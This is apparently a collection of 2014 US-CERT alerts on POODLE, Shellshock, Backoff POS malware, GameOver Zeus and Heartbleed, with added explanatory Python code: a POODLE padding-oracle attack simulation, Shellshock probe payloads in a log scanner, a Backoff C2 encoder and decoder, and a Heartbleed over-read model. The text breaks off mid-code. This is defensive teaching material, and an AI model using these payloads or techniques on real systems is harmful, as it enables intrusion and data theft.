While SSL 3.0 is an old encryption standard and has generally been replaced by Transport Layer Security (TLS), which is not vulnerable in this way, most SSL/TLS implementations remain backwards compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. Even if a client and server both support a version of TLS, the SSL/TLS protocol suite allows for protocol version negotiation (referred to as the "downgrade dance" in other reporting). The POODLE attack leverages the fact that when a secure connection attempt fails, many clients retry with older protocol versions, down to SSL 3.0, and a server that still supports SSL 3.0 will accept that retry. An attacker who can trigger a connection failure can therefore force the use of SSL 3.0 and attempt the new attack.
[1] Two other conditions must be met to successfully execute the POODLE attack: 1) the attacker must be able to control portions of the client side of the SSL connection (varying the length of the input), and 2) the attacker must have visibility of the resulting ciphertext. The most common way to achieve these conditions is to act as a Man-in-the-Middle (MITM), which requires a whole separate form of attack to establish that level of access. These conditions make successful exploitation somewhat difficult. Environments that are already at above-average risk for MITM attacks (such as public WiFi) remove some of those challenges.

The POODLE attack can be used against any system or application that supports SSL 3.0 with CBC mode ciphers. This affects most current browsers and websites, but also includes any software that either references a vulnerable SSL/TLS library (e.g. OpenSSL) or implements the SSL/TLS protocol suite itself.

By exploiting this vulnerability in a likely web-based scenario, an attacker can gain access to sensitive data passed within the encrypted web session, such as passwords, cookies and other authentication tokens, which can then be used to gain more complete access to a website (impersonating that user, accessing database content, etc.).

There is currently no fix for the SSL 3.0 vulnerability itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system and application configurations is the most viable solution currently available. Some of the same researchers that discovered the vulnerability also developed a fix for one of the prerequisite conditions: TLS_FALLBACK_SCSV is a protocol extension that prevents MITM attackers from being able to force a protocol downgrade. OpenSSL has added support for TLS_FALLBACK_SCSV to its latest versions and recommends the following upgrades: [2]

Both clients and servers need to support TLS_FALLBACK_SCSV to prevent downgrade attacks. Note that TLS_FALLBACK_SCSV only stops the downgrade; a connection that legitimately negotiates SSL 3.0 with a CBC cipher remains exposed, so disabling SSL 3.0 is still required.
Other SSL 3.0 implementations are most likely also affected by POODLE. Contact your vendor for details. Additional vendor information may be available in the National Vulnerability Database (NVD) entry for CVE-2014-3566 [3] or in CERT Vulnerability Note VU#577193. [4]
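The padding rule described above is easiest to see in code. The following is an added example written for this page, not code from the POODLE researchers or from any SSL library: a toy CBC record layer with the SSL 3.0 padding check beside the TLS one, and an attacker that uses only the server's accept/reject answer to recover a secret byte by byte. The hash-based Feistel cipher, the 16-byte truncated HMAC, and the single CbcSession object standing in for both the victim's browser and the server are simplifications chosen for the example; the attack logic (move the target block into the padding position, read the byte off when the server accepts) is the one the advisory describes.

```python
"""POODLE as a padding-oracle simulation: SSL 3.0-style CBC padding beside the TLS check.
Example code for this page. A hash-based Feistel network stands in for the real block
cipher (assumption: the cipher is irrelevant to the attack, the padding rule is what matters)
and one CbcSession plays both the victim's browser (encrypt_record) and the server (accepts)."""
import hashlib
import hmac
import os

BLOCK = 16    # toy cipher block size
MAC_LEN = 16  # truncated HMAC-SHA256 stands in for the record MAC


def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    """8-round Feistel over a 16-byte block (toy cipher, not AES)."""
    left, right = block[:8], block[8:]
    for rnd in range(8):
        left, right = right, _xor(left, _f(key, right, rnd))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(8)):
        left, right = _xor(right, _f(key, left, rnd)), left
    return left + right


def cbc_encrypt(key, iv, data):
    out, prev = bytearray(), iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return bytes(out)


def cbc_decrypt(key, iv, data):
    out, prev = bytearray(), iv
    for i in range(0, len(data), BLOCK):
        out += _xor(block_decrypt(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return bytes(out)


class CbcSession:
    """Record layer: plaintext || MAC || padding || padding_length, CBC-encrypted."""

    def __init__(self, tls_style_padding=False):
        self.key, self.mac_key = os.urandom(16), os.urandom(16)
        self.tls_style_padding = tls_style_padding

    def encrypt_record(self, plaintext):
        body = plaintext + hmac.new(self.mac_key, plaintext, hashlib.sha256).digest()[:MAC_LEN]
        pad_len = BLOCK - 1 - len(body) % BLOCK  # SSL 3.0: length byte excludes itself, padding < one block
        pad = bytes([pad_len]) * pad_len if self.tls_style_padding else os.urandom(pad_len)
        iv = os.urandom(BLOCK)
        return iv, cbc_encrypt(self.key, iv, body + pad + bytes([pad_len]))

    def accepts(self, iv, ciphertext):
        pt = cbc_decrypt(self.key, iv, ciphertext)
        pad_len = pt[-1]
        if pad_len >= BLOCK or pad_len + 1 + MAC_LEN > len(pt):
            return False
        # TLS 1.0+ checks every padding byte; SSL 3.0 checks only the length byte (the oracle)
        if self.tls_style_padding and pt[-(pad_len + 1):] != bytes([pad_len]) * (pad_len + 1):
            return False
        body = pt[:-(pad_len + 1)]
        expected = hmac.new(self.mac_key, body[:-MAC_LEN], hashlib.sha256).digest()[:MAC_LEN]
        return hmac.compare_digest(expected, body[-MAC_LEN:])


def browser(session, secret):
    """The attacker-influenced client: sends prefix || secret || suffix, attacker picks the lengths."""
    return lambda prefix, suffix: session.encrypt_record(prefix + secret + suffix)


def poodle_recover(session, secret_len, send, max_tries=50000):
    """Recover the secret one byte per ~256 requests; returns (bytes recovered, requests used)."""
    recovered, queries = bytearray(), 0
    for k in range(secret_len):
        prefix_len = (BLOCK - 1 - k) % BLOCK                          # secret[k] becomes last byte of a block
        target = (prefix_len + k) // BLOCK                            # index of that ciphertext block
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK   # forces a full block of padding
        for _ in range(max_tries):
            iv, ct = send(b"A" * prefix_len, b"B" * suffix_len)
            queries += 1
            blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
            tampered = ct[:-BLOCK] + blocks[target + 1]               # padding block := target block
            if session.accepts(iv, tampered):
                # server saw D(C_target) ^ C_(last-1) end in BLOCK-1, so
                # P_target[-1] = (BLOCK-1) ^ C_(target-1)[-1] ^ C_(last-1)[-1]
                recovered.append((BLOCK - 1) ^ blocks[target][-1] ^ blocks[-2][-1])
                break
        else:
            break  # never accepted within budget: no usable oracle (the TLS padding check)
    return bytes(recovered), queries


if __name__ == "__main__":
    sess = CbcSession()
    print(poodle_recover(sess, 4, browser(sess, b"S3cr")))
```

Run against CbcSession(tls_style_padding=True) the same attacker gets nothing back, which is the whole difference between SSL 3.0 and TLS here; the fix in practice is still to disable SSL 3.0, because a server cannot retrofit the TLS padding check onto the SSL 3.0 record format.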
TA14-268A: GNU Bourne-Again Shell (Bash) 'Shellshock' Vulnerability (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277 and CVE-2014-6278)
A critical vulnerability has been reported in the GNU Bourne-Again Shell (Bash), the common command-line shell used in many Linux/UNIX operating systems and Apple's Mac OS X. The flaw could allow an attacker to remotely execute shell commands by attaching malicious code to environment variables used by the operating system [1]. The United States Department of Homeland Security (DHS) is releasing this Technical Alert to provide further information about the GNU Bash vulnerability.

GNU Bash versions 1.14 through 4.3 contain a flaw in the way exported shell functions are imported from the environment: Bash treats any environment variable whose value begins with "() {" as a function definition, and affected versions continue parsing and execute any commands placed after the function body. This allows remote attackers to execute arbitrary code via a crafted environment, which enables network-based exploitation wherever untrusted input becomes an environment variable before Bash is invoked (for example CGI scripts, where the web server exports HTTP request headers as HTTP_* variables). [2, 3] Critical instances where the vulnerability may be exposed include: [4, 5]

This vulnerability is classified by industry standards as "High" impact with a CVSS Impact Subscore of 10 and "Low" complexity, which means it takes little skill to perform. This flaw allows attackers who can provide specially crafted environment variables containing arbitrary commands to execute them on vulnerable systems. It is especially dangerous because of the prevalent use of the Bash shell and the number of ways an application can invoke it.

Initial solutions for Shellshock did not completely resolve the vulnerability. It is advised to install existing patches and watch for updated patches that address CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278. Red Hat has provided a support article [6] with updated information.

Many UNIX-like operating systems, including Linux distributions and Apple Mac OS X, include Bash and are likely to be affected. Contact your vendor for updated information. A list of vendors can be found in CERT Vulnerability Note VU#252743 [7].
US-CERT recommends system administrators review the vendor patches and the NIST Vulnerability Summaries for CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277 and CVE-2014-6278 to mitigate damage caused by the exploit.
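To make the exposure path concrete, the following is an added example written for this page (not from the advisory or from Red Hat): it reproduces the CGI mapping that turns request headers into environment variables, scans constructed Apache combined-format log lines for the function-import pattern, and wraps the local bash probe from Red Hat's support article in a subprocess call. The regular expressions, the log lines and the function names are this example's own.

```python
"""Where Shellshock input enters and how to spot it: the CGI environment mapping, an
access-log scan, and the local bash probe. Example code for this page, not from the
advisory; the log lines are constructed and the regexes are the example's own."""
import os
import re
import shutil
import subprocess

# Bash imports exported functions from environment variables whose value starts with "() {".
# Affected versions keep parsing past the function body and run whatever follows.
FUNCTION_IMPORT_RE = re.compile(r"^\s*\(\)\s*\{")


def cgi_environment(headers):
    """Mirror the CGI gateway behaviour that put HTTP headers into Bash's environment."""
    return {"HTTP_" + name.upper().replace("-", "_"): value for name, value in headers.items()}


def shellshock_candidates(env):
    """Environment entries that Bash would parse as function definitions."""
    return {name: value for name, value in env.items() if FUNCTION_IMPORT_RE.match(value)}


# Apache combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"'
)

# Constructed sample lines (not from a real server); two carry Shellshock probes.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /usr/bin/id"',
    '198.51.100.7 - - [25/Sep/2014:10:01:13 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [25/Sep/2014:10:01:14 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "() { (a)=>\\" "curl/7.38"',
]


def scan_access_log(lines):
    """Return (ip, request, header value) for every Referer or User-Agent that is a function import."""
    hits = []
    for line in lines:
        m = COMBINED_LOG_RE.match(line)
        if not m:
            continue
        for field in ("user_agent", "referer"):
            if FUNCTION_IMPORT_RE.match(m[field]):
                hits.append((m["ip"], m["request"], m[field]))
    return hits


def probe_local_bash(timeout=5.0):
    """The CVE-2014-6271 check from Red Hat's article, run through subprocess:
    True = vulnerable (bash printed "vulnerable"), False = patched, None = no bash found."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin"), "x": "() { :;}; echo vulnerable"}
    result = subprocess.run([bash, "-c", "echo this is a test"], env=env,
                            capture_output=True, text=True, timeout=timeout)
    return "vulnerable" in result.stdout


if __name__ == "__main__":
    for ip, request, value in scan_access_log(SAMPLE_ACCESS_LOG):
        print("shellshock probe from %s against %s: %r" % (ip, request, value))
    print("local bash vulnerable:", probe_local_bash())
```

The third sample line shows why the log scan keys on the "() {" prefix rather than on a full payload: the CVE-2014-7169 follow-up used a different tail, and the prefix is what every variant shares.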
TA14-212A: Backoff Point-of-Sale Malware
Systems affected: Point-of-Sale Systems

This advisory was prepared in collaboration with the National Cybersecurity and Communications Integration Center (NCCIC), United States Secret Service (USSS), Financial Sector Information Sharing and Analysis Center (FS-ISAC), and Trustwave SpiderLabs, a trusted partner under contract with the USSS. The purpose of this release is to provide relevant and actionable technical indicators for network defense against the PoS malware dubbed "Backoff", which has been discovered exploiting businesses' administrator accounts remotely and exfiltrating consumer payment data.

Over the past year, the Secret Service has responded to network intrusions at numerous businesses throughout the United States that have been impacted by the "Backoff" malware. Seven PoS system providers/vendors have confirmed that they have had multiple clients affected. Reporting continues on additional compromised locations, involving private sector entities of all sizes, and the Secret Service currently estimates that over 1,000 U.S. businesses are affected.

Recent investigations revealed that malicious actors are using publicly available tools to locate businesses that use remote desktop applications. Remote desktop solutions like Microsoft's Remote Desktop [1], Apple Remote Desktop [2], Chrome Remote Desktop [3], Splashtop 2 [4], and LogMeIn [5] offer the convenience and efficiency of connecting to a computer from a remote location. Once these applications were located, the suspects attempted to brute-force the login of the remote desktop solution. After gaining access to what were often administrator or otherwise privileged accounts, the suspects were then able to deploy the point-of-sale (PoS) malware and subsequently exfiltrate consumer payment data via encrypted POST requests.

Organizations that believe they have been impacted should contact their local Secret Service field office and may contact the NCCIC for additional information.
"Backoff" is a family of PoS malware that has been discovered recently. The malware family has been witnessed on at least three separate forensic investigations. Researchers have identified three primary versions of the "Backoff" malware: 1.4, 1.55 ("backoff", "goo", "MAY", "net"), and 1.56 ("LAST"). These variants have been seen as far back as October 2013 and continued to operate as of July 2014.

In total, the malware typically consists of the following four capabilities. An exception is the earliest witnessed variant (1.4), which does not include keylogging functionality. Additionally, 1.55 "net" removed the explorer.exe injection component:

- Injection into explorer.exe: the malicious stub that is injected into explorer.exe is responsible for persistence in the event the malicious executable crashes or is forcefully stopped.
- Memory scraping: the malware scrapes memory from running processes on the victim machine, searching for track data.
- Keylogging: keylogging functionality is present in the most recent variants of "Backoff".
- Command and control (C2): the C2 component is responsible for uploading discovered data, updating the malware, downloading and executing further malware, and uninstalling the malware.

Variants

Based on compile timestamps and versioning information witnessed in the C2 HTTP POST requests, "Backoff" variants were analyzed over a seven-month period. The five later variants in the "Backoff" malware family have notable modifications from 1.4: 1.55 "backoff", 1.55 "goo", 1.55 "MAY", 1.55 "net", and 1.56 "LAST".

Command & Control Communication

All C2 communication for "Backoff" takes place via HTTP POST requests. A number of POST parameters are included when this malware makes a request to the C2 server. The 'id' parameter is stored in the registry value HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier (listed under Registry Keys for every variant below) to ensure it is consistent across requests; if this value doesn't exist, the string is generated and stored. Data is encrypted using RC4 prior to being encoded with Base64.
The password for RC4 is generated from the 'id' parameter, a static string (for example 'jhgtsd7fjmytkr' in the "goo", "MAY" and "LAST" variants; each variant's string is listed under Static String below), and the 'ui' parameter. These values are concatenated together and then hashed using the MD5 algorithm to form the RC4 password. For example, with an id of 'vxeyHkS' and a ui of 'Josh @ PC123456', the concatenated string is 'vxeyHkSjhgtsd7fjmytkrJosh @ PC123456' and the RC4 password would be its MD5 hash, '56E15A1B3CB7116CAB0268AC8A2CD943'.

File Indicators

The following is a list of Indicators of Compromise (IOCs) that should be added to network security tooling and searched for to determine whether these indicators are present on your network.

1.4
Packed MD5: 927AE15DBF549BD60EDCDEAFB49B829E
Unpacked MD5: 6A0E49C5E332DF3AF78823CA4A655AE8
Install Path: %APPDATA%\AdobeFlashPlayer\mswinsvc.exe
Mutexes: uhYtntr56uisGst, uyhnJmkuTgD
Files Written: %APPDATA%\mskrnl, %APPDATA%\winserv.exe, %APPDATA%\AdobeFlashPlayer\mswinsvc.exe
Static String (POST Request): zXqW9JdWLM4urgjRkX
Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier, HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Service
User-Agent: Mozilla/4.0
URI(s): /aircanada/dark.php

1.55 "backoff"
Packed MD5: F5B4786C28CCF43E569CB21A6122A97E
Unpacked MD5: CA4D58C61D463F35576C58F25916F258
Install Path: %APPDATA%\AdobeFlashPlayer\mswinhost.exe
Mutexes: Undsa8301nskal, uyhnJmkuTgD
Files Written: %APPDATA%\mskrnl, %APPDATA%\winserv.exe, %APPDATA%\AdobeFlashPlayer\mswinhost.exe, %APPDATA%\AdobeFlashPlayer\Local.dat, %APPDATA%\AdobeFlashPlayer\Log.txt
Static String (POST Request): ihasd3jasdhkas
Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier, HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Service
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
URI(s): /aero2/fly.php

1.55 "goo"
Packed MD5: 17E1173F6FC7E920405F8DBDE8C9ECAC
Unpacked MD5: D397D2CC9DE41FB5B5D897D1E665C549
Install Path: %APPDATA%\OracleJava\javaw.exe
Mutexes: nUndsa8301nskal, nuyhnJmkuTgD
Files Written: %APPDATA%\nsskrnl, %APPDATA%\winserv.exe, %APPDATA%\OracleJava\javaw.exe, %APPDATA%\OracleJava\Local.dat, %APPDATA%\OracleJava\Log.txt
Static String (POST Request): jhgtsd7fjmytkr
Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier, HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Service
User-Agent: (not listed)
URI(s): /windows/updcheck.php

1.55 "MAY"
Packed MD5: 21E61EB9F5C1E1226F9D69CBFD1BF61B
Unpacked MD5: CA608E7996DED0E5009DB6CC54E08749
Install Path: %APPDATA%\OracleJava\javaw.exe
Mutexes: nUndsa8301nskal, nuyhnJmkuTgD
Files Written: %APPDATA%\nsskrnl, %APPDATA%\winserv.exe, %APPDATA%\OracleJava\javaw.exe, %APPDATA%\OracleJava\Local.dat, %APPDATA%\OracleJava\Log.txt
Static String (POST Request): jhgtsd7fjmytkr
Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier, HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Service
User-Agent: (not listed)
URI(s): /windowsxp/updcheck.php

1.55 "net"
Packed MD5: 0607CE9793EEA0A42819957528D92B02
Unpacked MD5: 5C1474EA275A05A2668B823D055858D9
Install Path: %APPDATA%\AdobeFlashPlayer\mswinhost.exe
Mutexes: nUndsa8301nskal
Files Written: %APPDATA%\AdobeFlashPlayer\mswinhost.exe, %APPDATA%\AdobeFlashPlayer\Local.dat, %APPDATA%\AdobeFlashPlayer\Log.txt
Static String (POST Request): ihasd3jasdhkas9
Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier, HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Service
User-Agent: (not listed)
URI(s): /windowsxp/updcheck.php

1.56 "LAST"
Packed MD5: 12C9C0BC18FDF98189457A9D112EEBFC
Unpacked MD5: 205947B57D41145B857DE18E43EFB794
Install Path: %APPDATA%\OracleJava\javaw.exe
Mutexes: nUndsa8301nskal, nuyhnJmkuTgD
Files Written: %APPDATA%\nsskrnl, %APPDATA%\winserv.exe, %APPDATA%\OracleJava\javaw.exe, %APPDATA%\OracleJava\Local.dat, %APPDATA%\OracleJava\Log.txt
Static String (POST Request): jhgtsd7fjmytkr
Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier, HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Service, HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Service, HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components\{B3DB0D62-B481-4929-888B-49F426C1A136}\StubPath, HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{B3DB0D62-B481-4929-888B-49F426C1A136}\StubPath
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
URI(s): /windebug/updcheck.php

The impact of a compromised PoS system can affect both businesses and consumers by exposing customer data such as names, mailing addresses, credit/debit card numbers, phone numbers, and e-mail addresses to criminal elements. These breaches can impact a business' brand and reputation, while consumers' information can be used to make fraudulent purchases or risk compromise of bank accounts. It is critical to safeguard your corporate networks and web servers to prevent any unnecessary exposure to compromise or to mitigate any damage that could be occurring now.

At the time this advisory is released, the variants of the "Backoff" malware family are largely undetected by anti-virus (AV) vendors. However, shortly following the publication of this technical analysis, AV companies will quickly begin detecting the existing variants. It is important to maintain up-to-date AV signatures and engines, as new threats such as this are continually being added to your AV solution. Pending AV detection of the malware variants, network defenders can apply indicators of compromise (IOC) to a variety of prevention and detection strategies. [6],[7],[8] IOCs can be found above.

The forensic investigations of compromises of retail IT/payment networks indicate that the network compromises allowed the introduction of memory-scraping malware to the payment terminals. Information security professionals recommend a defense-in-depth approach to mitigating risk to retail payment systems.
While some of the risk mitigation recommendations are general in nature, the following strategies provide an approach to minimize the possibility of an attack and mitigate the risk of data compromise. They are grouped under remote desktop access, network security, and cash register and PoS security:
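The C2 key derivation described in the Command & Control Communication section above (MD5 over id, static string and ui; RC4; Base64) is enough to write a decoder for captured POST bodies. The following is an added example written for this page, not the malware's code and not Trustwave's tooling. Assumptions it makes: the RC4 key is the uppercase hex MD5 string exactly as the advisory prints it, the ciphertext travels in a POST field named "data" (the field name is assumed; the advisory's parameter list is not reproduced on this page), and the sample body is constructed with encode_post rather than taken from real traffic. The static strings are the per-variant values from the IOC list.

```python
"""Decoder for Backoff C2 POST bodies as the advisory describes them:
key = MD5(id || static string || ui) as uppercase hex, data RC4-encrypted then Base64-encoded.
Example code for this page; the "data" field name is assumed, the sample body is constructed."""
import base64
import hashlib
from urllib.parse import parse_qs, urlencode

# "Static String (POST Request)" for each variant, from the IOC list above.
STATIC_STRINGS = {
    "1.4": "zXqW9JdWLM4urgjRkX",
    "1.55 backoff": "ihasd3jasdhkas",
    "1.55 goo": "jhgtsd7fjmytkr",
    "1.55 MAY": "jhgtsd7fjmytkr",
    "1.55 net": "ihasd3jasdhkas9",
    "1.56 LAST": "jhgtsd7fjmytkr",
}


def derive_rc4_key(bot_id, static_string, ui):
    """MD5 over the concatenation id + static + ui, returned as an uppercase hex string."""
    return hashlib.md5((bot_id + static_string + ui).encode("latin-1")).hexdigest().upper()


def rc4(key, data):
    """Textbook RC4 (KSA then PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_post(body, static_string):
    """Parse the form body, rebuild the key from id and ui, decrypt the data field.
    Returns (all parameters, decrypted payload)."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    key = derive_rc4_key(params["id"], static_string, params["ui"]).encode("ascii")
    return params, rc4(key, base64.b64decode(params["data"]))


def encode_post(bot_id, ui, static_string, payload, **extra):
    """Build a body the same way; used here only to construct test input for the decoder."""
    key = derive_rc4_key(bot_id, static_string, ui).encode("ascii")
    fields = {"id": bot_id, "ui": ui, "data": base64.b64encode(rc4(key, payload)).decode("ascii")}
    fields.update(extra)
    return urlencode(fields)


if __name__ == "__main__":
    body = encode_post("vxeyHkS", "Josh @ PC123456", STATIC_STRINGS["1.55 goo"], b"constructed track data")
    print(body)
    print(decode_post(body, STATIC_STRINGS["1.55 goo"]))
```

derive_rc4_key("vxeyHkS", STATIC_STRINGS["1.55 goo"], "Josh @ PC123456") can be compared against the hash the advisory prints for that example; when decoding real captures, pick the static string for the variant identified by the URI or the file hashes, since the "backoff" and "net" variants use different strings from "goo", "MAY" and "LAST".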
TA14-150A: GameOver Zeus P2P Malware
GameOver Zeus (GOZ), a peer-to-peer (P2P) variant of the Zeus family of bank credential-stealing malware identified in September 2011, [1] uses a decentralized network infrastructure of compromised personal computers and web servers to execute command and control. The United States Department of Homeland Security (DHS), in collaboration with the Federal Bureau of Investigation (FBI) and the Department of Justice (DOJ), is releasing this Technical Alert to provide further information about the GameOver Zeus botnet.

GOZ, which is often propagated through spam and phishing messages, is primarily used by cybercriminals to harvest banking information, such as login credentials, from a victim's computer. [2] Infected systems can also be used to engage in other malicious activities, such as sending spam or participating in distributed denial-of-service (DDoS) attacks.

Prior variants of the Zeus malware utilized a centralized command and control (C2) botnet infrastructure to execute commands. Centralized C2 servers are routinely tracked and blocked by the security community. [1] GOZ, however, utilizes a P2P network of infected hosts to communicate and distribute data, and employs encryption to evade detection. These peers act as a massive proxy network that is used to propagate binary updates, distribute configuration files, and send stolen data. [3] Without a single point of failure, the resiliency of GOZ's P2P infrastructure makes takedown efforts more difficult. [1]

A system infected with GOZ may be employed to send spam, participate in DDoS attacks, and harvest users' credentials for online services, including banking services.
Users are recommended to take the following actions to remediate GOZ infections:

Removal tools and the Windows versions each vendor lists:
- F-Secure: http://www.f-secure.com/en/web/home_global/online-scanner (Windows Vista, 7 and 8)
- F-Secure: http://www.f-secure.com/en/web/labs_global/removal-tools/-/carousel/view/142 (Windows XP)
- Heimdal Security: http://goz.heimdalsecurity.com/ (Microsoft Windows XP, Vista, 7, 8 and 8.1)
- McAfee: www.mcafee.com/stinger (Windows XP SP2, 2003 SP2, Vista SP1, 2008, 7 and 8)
- Microsoft: http://www.microsoft.com/security/scanner/en-us/default.aspx (Windows 8.1, Windows 8, Windows 7, Windows Vista, and Windows XP)
- Sophos: http://www.sophos.com/VirusRemoval (Windows XP (SP2) and above)
- Symantec: http://www.symantec.com/connect/blogs/international-takedown-wounds-gameover-zeus-cybercrime-network (Windows XP, Windows Vista and Windows 7)
- Trend Micro: http://www.trendmicro.com/threatdetector (Windows XP, Windows Vista, Windows 7, Windows 8/8.1, Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2)

www.decryptcryptolocker.com: FireEye and Fox-IT have created a web portal claiming to restore/decrypt files of CryptoLocker victims. US-CERT has performed no evaluation of this claim, but is providing a link to enable individuals to make their own determination of suitability for their needs. At present, US-CERT is not aware of any other product that claims similar functionality.
TA14-098A: OpenSSL 'Heartbleed' vulnerability (CVE-2014-0160)
A vulnerability in OpenSSL could allow a remote attacker to expose sensitive data, possibly including user authentication credentials and secret keys, through incorrect memory handling in the TLS heartbeat extension.

OpenSSL versions 1.0.1 through 1.0.1f contain a flaw in their implementation of the TLS/DTLS heartbeat functionality. A heartbeat request carries a payload and a two-byte field stating the payload's length; the vulnerable code trusts that field and copies that many bytes from the incoming record into the response without checking that they fit inside the record it actually received. This flaw allows an attacker to retrieve private memory of an application that uses the vulnerable OpenSSL library in chunks of up to 64k at a time. Note that an attacker can repeatedly leverage the vulnerability to retrieve as many 64k chunks of memory as are necessary to retrieve the intended secrets. The sensitive information that may be retrieved using this vulnerability include:

Exploit code is publicly available for this vulnerability. Additional details may be found in CERT/CC Vulnerability Note VU#720951.

OpenSSL 1.0.1g has been released to address this vulnerability. Any private keys held by a process that used a vulnerable version of OpenSSL should be considered compromised and should be regenerated and deployed after the patch has been applied; certificates issued for those keys should be revoked and reissued, and credentials such as passwords and session tokens that may have passed through the vulnerable process should be reset. US-CERT recommends system administrators consider implementing Perfect Forward Secrecy to mitigate the damage that may be caused by future private key disclosures.
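The over-read is a few lines of logic, so the following added example models it directly. This is example code written for this page, not OpenSSL source: a bytes object stands in for process memory, the heartbeat record is a slice of it, and the constructed bytes that follow the record play the role of neighbouring allocations that the peer was never meant to read. The two length checks in process_heartbeat_fixed mirror the ones the 1.0.1g patch added; the function and constant names are this example's own.

```python
"""Model of the heartbeat over-read (CVE-2014-0160) beside the bounds check that fixed it.
Example code for this page, not OpenSSL source. Memory is a bytes object; the record is a
slice of it; NEIGHBOUR_DATA is constructed and stands in for adjacent heap allocations."""
HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
PADDING = 16  # OpenSSL requires at least 16 bytes of padding after the payload


def build_heartbeat(payload, claimed_length=None):
    """type(1) | payload_length(2) | payload | padding. A hostile peer lies in payload_length."""
    length = len(payload) if claimed_length is None else claimed_length
    return bytes([HEARTBEAT_REQUEST]) + length.to_bytes(2, "big") + payload + b"\x00" * PADDING


def _parse_header(memory, offset):
    hbtype = memory[offset]
    payload_length = int.from_bytes(memory[offset + 1:offset + 3], "big")
    return hbtype, payload_length, offset + 3


def process_heartbeat_vulnerable(memory, offset, record_length):
    """OpenSSL 1.0.1 through 1.0.1f: copies payload_length bytes from the record
    without comparing it to record_length, so the copy runs into adjacent memory."""
    hbtype, payload_length, p = _parse_header(memory, offset)
    if hbtype != HEARTBEAT_REQUEST:
        return None
    echoed = memory[p:p + payload_length]  # memcpy(bp, pl, payload): the over-read happens here
    return bytes([HEARTBEAT_RESPONSE]) + payload_length.to_bytes(2, "big") + echoed + b"\x00" * PADDING


def process_heartbeat_fixed(memory, offset, record_length):
    """OpenSSL 1.0.1g: silently discard any record whose claimed payload does not fit in it."""
    if 1 + 2 + PADDING > record_length:  # not even a header plus minimum padding
        return None
    hbtype, payload_length, p = _parse_header(memory, offset)
    if 1 + 2 + payload_length + PADDING > record_length:  # the added bounds check
        return None
    if hbtype != HEARTBEAT_REQUEST:
        return None
    return (bytes([HEARTBEAT_RESPONSE]) + payload_length.to_bytes(2, "big")
            + memory[p:p + payload_length] + b"\x00" * PADDING)


def leaked_bytes(response, sent_payload):
    """Whatever the echoed payload contains beyond what the client actually sent."""
    length = int.from_bytes(response[1:3], "big")
    return response[3:3 + length][len(sent_payload):]


# Constructed neighbouring heap contents; nothing here is real key material.
NEIGHBOUR_DATA = b"Cookie: session=7d1f0c9e; user=admin\n-----BEGIN RSA PRIVATE KEY-----\nMIIEow"


def run_heartbeat(claimed_length, payload=b"hello"):
    """Process one request against both builds; returns (vulnerable reply, fixed reply)."""
    record = build_heartbeat(payload, claimed_length)
    heap = record + NEIGHBOUR_DATA
    return (process_heartbeat_vulnerable(heap, 0, len(record)),
            process_heartbeat_fixed(heap, 0, len(record)))


if __name__ == "__main__":
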